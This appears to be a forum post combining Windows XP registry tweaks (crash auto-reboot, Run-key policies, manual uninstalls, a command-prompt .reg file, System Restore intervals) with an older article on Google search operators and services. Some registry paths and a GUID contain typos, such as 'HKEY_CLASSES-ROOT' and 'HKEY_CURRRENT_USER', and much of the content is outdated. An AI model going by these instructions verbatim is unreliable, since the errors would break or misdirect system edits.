Go to: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters

Modify/Create DWORD Value of Data type REG_DWORD Named [Autodisconnect]
Value Data: [Enter a new disconnect time. Use Hexadecimal if you are unfamiliar with Binary]

Exit Registry / Reboot

25. Auto Reboot on System Crash

By default, when the Windows XP operating system crashes an automatic reboot of the system occurs. While this behavior can be convenient, the downside is the error message accompanying the crash is not visible. Often times this information can be a great help in troubleshooting the source of the crash. This behavior can be modified in two ways; via the registry or using the System Properties property sheet.

[Start] [Run] [Regedit]

Registry Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl

Modify/Create DWORD Value of Data type REG_DWORD Named [AutoReboot]
Setting for Value Data: [0 = AutoReboot Disabled / 1 = AutoReboot Enabled]

Exit Registry / Reboot

Open System Properties via Start > Control Panel > Performance and Maintenance > System

[System Properties may also be opened using the WinKey+Pause key combination]

Select the Advanced tab and then click Settings in the Startup and Recovery section

In System Failure section, clear the checkbox next to Automatically Restart

Click OK and OK to exit

26. Modify Control Panel Categories

Even if you like the new style for Control Panel, you might at times wish you could shift some items around into a different category. It's possible.

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Extended Properties\{305CA226-D286-468e-B848-2B2E8E697B74} 2

Modify/Create DWORD Value of Data type REG_DWORD Named [Choose one of the applets with .cpl extension]

Setting for Value Data: [Select the value from table below]

Other Control Panel Options 0
Appearance and Themes 1
Printers and Other Hardware 2
Network and Internet Connections 3
Sounds, Speed, and Audio Devices 4
Performance and Maintenance 5
Date, Time, Language, and Regional Options 6
Accessibility Options 7
Add or Remove Programs 8
User Accounts 9

Exit Registry / Reboot

To further customize the items that appear in the new Control Panel, do a search of your system for all files that end in .cpl extension. If they aren't already listed, you can add them with a new DWORD value and then assign them to a category of your choosing.

27. Enable/Disable Run Commands Specific to the Registry

This tweak controls the use of the Run command on the local machine

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer

Create a DWORD value of Data Type REG_DWORD for each Run function that will be disabled.

Modify/Create the Value Name [DisableLocalMachineRun]
Modify/Create the Value Name [DisableLocalMachineRunOnce]

Modify/Create the Value Name [DisableCurrentUserRun]
Modify/Create the Value Name [DisableCurrentUserRunOnce]

Setting for Value Data: [0 = Disabled / 1 = Enabled]

Exit Registry / Reboot

28. Enable/Disable System Properties Access from My Computer

This tweak removes access to System Properties via My Computer as well as via Control Panel.

[Start] [Run] [Regedit]

Go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Modify/Create DWORD Value of Data type REG_DWORD Named [NoPropertiesMyComputer]
Value Data: [0 - Display Properties / 1 - Hide Properties]

Exit Registry / Reboot

29. Uninstall Programs Manually

Just because Windows XP has the Add/Remove Programs feature it doesn't mean your application will appear in the list. Furthermore, even if it does appear, it's no guarantee that the uninstall feature will work. When you run across one of these situations the items listed below will help in getting rid of the application. Be aware that these steps may not remove everything associated with the application and can impact other applications on the computer. Have a backup or restore point and use caution.

Find the directory for the application and delete all the files in the directory. Delete the directory.

Open regedit and navigate to HKEY_LOCAL_MACHINE\SOFTWARE and find the folder for the application. Delete the folder.

Open regedit and navigate to HKEY_CURRENT_USER\SOFTWARE and find the folder for the application. Delete the folder.

To remove the application entry from Add/Remove Programs (if present) open regedit and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and find the folder for the application. Delete the folder.

Some applications have Services attached to them. If this is the case, navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services, locate and delete the service.

In Windows Explorer, navigate to the individual user settings and delete program references. Common places to check would be:

C:\Documents and Settings\All Users\Start Menu\Programs and delete relevant entries.

C:\Documents and Settings\All Users\Start Menu\Programs\Startup and delete relevant entries.

C:\Documents and Settings\%YourUserID%\Start Menu\Programs and delete relevant entries.

[Do this for each User ID listed]

C:\Documents and Settings\%YourUserID%\Start Menu\Programs\Startup and delete relevant entries.

[Do this for each User ID listed]

If no entries were found in the previous step and the application launches automatically, navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows

and delete the entry.

30. Create a right-click command prompt option

You can right-click a folder to get a list of actions you can apply to it. Here?s a way to create an action on that right-click menu that opens a command prompt window with that folder as the current directory. In a text editor such as Notepad, type the following exactly:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Folder\shell\Cmd Here]

@=?Command &Prompt Here?

[HKEY_CLASSES-ROOT\Folder\shell\Cmd Here\command]

@=?cmd.exe /k pushd %L?

Save the file with any name you want, with a .reg extension. Then double-click the saved file and choose Yes to merge the file?s information into the Registry. You can delete the file. Right-click any folder and you?ll see the CommandPrompt Here option.

31. Adjusting System Restore values

The new System Restore feature in Windows XP automatically backs up a snapshot of your system, including your Registry, every 24 hours. It also saves restore points for 90 days. Neither of these values is directly editable in the System Restore program, but you can change them in the Registry. Go to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore

You?ll find an assortment of settings here. To change the interval between automatically created restore points, change the RPGlobalInterval setting. To change the number of days that a restore point is retained, change the RPLifeInterval setting.

System Restore time intervals are measured in seconds, not days, so you must convert the number of days you want into seconds. There are 86,400 seconds in a day, so multiply 86,400 by the number of days you want to determine the value. (There are 3,600 seconds in an hour, I hope you know)

32. Erase the swap file at shutdown

You might be concerned about someone browsing your users? swap files and gathering up little bits of their sensitive data. A remote possibility, to be sure, but it could happen. For that extra measure of security, go to:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management

Set the ClearPageFileAtShutdown DWORD to 1. This will make shutdowns take longer, because it overwrites everything in the swap file with zeroes. Don?t turn this feature on unless you have a serious security threat.

33. Delete the Files Stored on This Computer category in the My Computer window

In Windows XP, the My Computer window?s listing is broken down by categories: Hard Disk Drives, Devices with Removable Storage, and so on. One of these categories is Files Stored on This Computer, which appears at the top of the My Computer window. If a user doesn?t need it , you can get rid of it. To do so, go to:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\
NameSpace\Delegate Folders

Delete the {59031a47-3f72-44a7-89c55595fe6b30ee} subkey to remove the category.

34. Change the desktop cleanup frequency

Through Display Properties (Desktop tab, Customize Desktop button, General tab), you can turn on and off a feature that runs the Desktop Cleanup Wizard every 60 days. You don?t have an option to set a different interval there, but you can change the interval in the Registry. To do so, go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz

Change the Days Between Clean Up Value to some other number of days (in decimal format).

35. Sort menus alphabetically

When you install a new program for a user, it doesn?t find its place in the alphabetical Start menu hierarchy right away; it hangs out at the bottom for a little while. If your users employ the Classic Start menu, they can re-alphabetize it manually by right-clicking the taskbar and choosing Properties, clicking the Customize button next to the Classic Start Menu, and clicking the Sort button. With the Windows XP style of Start menu, however, you don?t have an equivalent button. To make Windows always alphabetize the list, remove the permissions from the Registry key that controls the sort order for the Start menu. To do so, go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder

Choose Edit | Permissions and click the Advanced button. Deselect the Inherit From Parent The Permission Entries That Apply To Child Objects check box and then click Copy when the Security dialog box pops up. Click OK and clear the Full Control entry for your account and all security groups you are a member of. Leave only Read permission.

36. Prevent programs from loading at startup

Remember back in the good old days of Windows 3.1 when you could open up the Win.ini file in a text editor and remove an item from the RUN= line to disable it from running at startup? With Windows 9x and above, the Win.ini file became less useful because 32-bit programs were set to run at startup from within the Registry instead.

One way to selectively disable programs from loading at startup is to use MSCONFIG (from the Run command) to deselect certain items. Another way to remove them is to edit the Registry directly. Consider the following locations:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

for applications that start up for all users

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

for applications that start up when the current user logs on

Remove the entry for a program by right-clicking it and selecting Delete to prevent it from loading.

37. Change categories in the Control Panel

Windows XP?s Control Panel is broken down by category in the default Category view, but the group to which an item belongs is not always obvious. If you disagree with Microsoft?s assignments, you can switch them around. To assign a different category to an item, go to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Extended Properties\
{305CA226-D286-468e-B848-2B2E8E697B74} 2

Find the item you want to change and double-click it to bring up a dialog box. Change the item?s DWORD value to your preference. Use the Table given below as a guide (shown with decimal numbers, which is the way you should enter them).

DWORD value to set

Other Control Panel Options 0

Appearance and Themes 1

Printers and Other Hardware 2

Network and Internet Connections 3

Sounds, Speed, and Audio Devices 4

Performance and Maintenance 5

Date, Time, Language, and Regional Options 6

Accessibility Options 7

Add or Remove Programs 8

User Accounts 9

38. Grouping multiple open windows

Windows XP will group multiple open windows (IE windows for example) into one group on the task bar to keep the taskbar clear. This can be annoying at times - especially when comparing different web pages because you have to go back to the task bar, click on the group and then click on the page you want and then you only get one page because you have to click on each one separately. I think the default for this is 8 windows - any combination of apps or utilities open.

You can modify this behavior by adding this registry key at:

HKEY_CURRRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\

add a Dword value of type REG_DWORD named [TaskbarGroupSize]

modify "TaskbarGroupSize" entry to be the number of windows you want open before XP starts to group them on the task bar.

A value of 2 will cause the Taskbar buttons to always group

Another tweak is to disable or enable recent documents history. This can be done at:

HKEY_CURRRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\

this key should already be present - if it isn't you'll need to add it:

Add a Binary value of type REG_BINARY named [NoRecentDocsHistory]

modify it so that value reads 01 00 00 00

39. Disable Tips

To disable Ballon tips in Windows XP do this registry tweak

Go to : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Create a new DWORD value, name it EnableBalloonTips, and set it equal to 0. If EnableBalloonTips is already there and equal to 1, set it equal to 0. Quit the registry editor, log off, and log back on. Voila! Your computer will stop talking down to you.

40. Add/Remove optional features of Windows XP

To dramatically expand the list of applications you can remove from Windows XP after installation, navigate to C:\WINDOWS\inf and open the sysoc.inf file. {Opps , if you didn?t find the inf directory, you are right. It?s a hidden folder, so go to Tools>Folder Options> View , enable Show Hidden Files & Folders.}

[Version]

Signature = "$Windows NT$"

DriverVer=07/01/2001,5.1.2600.0

[Components]

NtComponents=ntoc.dll,NtOcSetupProc,,4

WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7

Display=desk.cpl,DisplayOcSetupProc,,7

Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7

NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7

iis=iis.dll,OcEntry,iis.inf,,7

com=comsetup.dll,OcEntry,comnt5.inf,hide,7

dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7

IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7

TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2

msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6

ims=imsinsnt.dll,OcEntry,ims.inf,,7

fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7

AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7

IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

Games=ocgen.dll,OcEntry,games.inf,,7

AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7

CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7

MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7

AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7

Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7

MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7

ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7

[Global]

WindowTitle=%WindowTitle%

WindowTitle.StandAlone="*"

The entries that include the text hide or HIDE will not show up in Add/Remove Windows Components by default. To fix this, do a global search and replace for ,hide and change each instance of this to , (a comma). Then, save the file, re launch Add/Remove Windows Components,

41. Remove Windows Messenger

It seems that a lot of people are interested in removing Windows Messenger for some reason, though I strongly recommend against this: In Windows XP, Windows Messenger will be the hub of your connection to the .NET world, and now that this feature is part of Windows, I think we're going to see a lot of .NET Passport-enabled Web sites appearing as well. But if you can't stand the little app, there are a couple of ways to get rid of it, and ensure that it doesn't pop up every time you boot into XP. The best way simply utilizes the previous tip:

If you'd like Windows Messenger to show up in the list of programs you can add and remove from Windows, navigate to C:\WINDOWS\inf and open sysoc.inf (see the previous tip for more information about this file). You'll see a line that reads:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

Change this to the following and Windows Messenger will appear in Add or Remove Programs, then Add/Remove Windows Components, then , and you can remove it for good:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7

42. Rename multiple files ( it is not a Registry tweak though. I thought this to be really cool, so I have put it here)

A new, small, neat feature for Windows XP deals with renaming files. I personally have always wanted the OS to include a way to do a mass file renaming on a bunch of files. You can now rename multiple files at once .Its really simple:

Select several files in Explorer, press F2 and rename one of those files to something else. All the selected files get renamed to the new file name (plus a number added to the end).

20 Great Google Secrets

Google is clearly the best general-purpose search engine on the Web (see

www.pcmag.com/searchengines

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at

www.google.com/help/operators.html

. Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as

www.mysite.com/index.html

, you can enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in

link:http://www.pcmag.com

Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."

Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).

Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
CODE
(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at

www.google.com/options/index.html

You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from
CODE
www.google.com/apis

. See the figures for two more examples, and visit

www.pcmag.com/solutions

for more.

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.

Online Extra: More Google Tips

Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE
http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif

), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.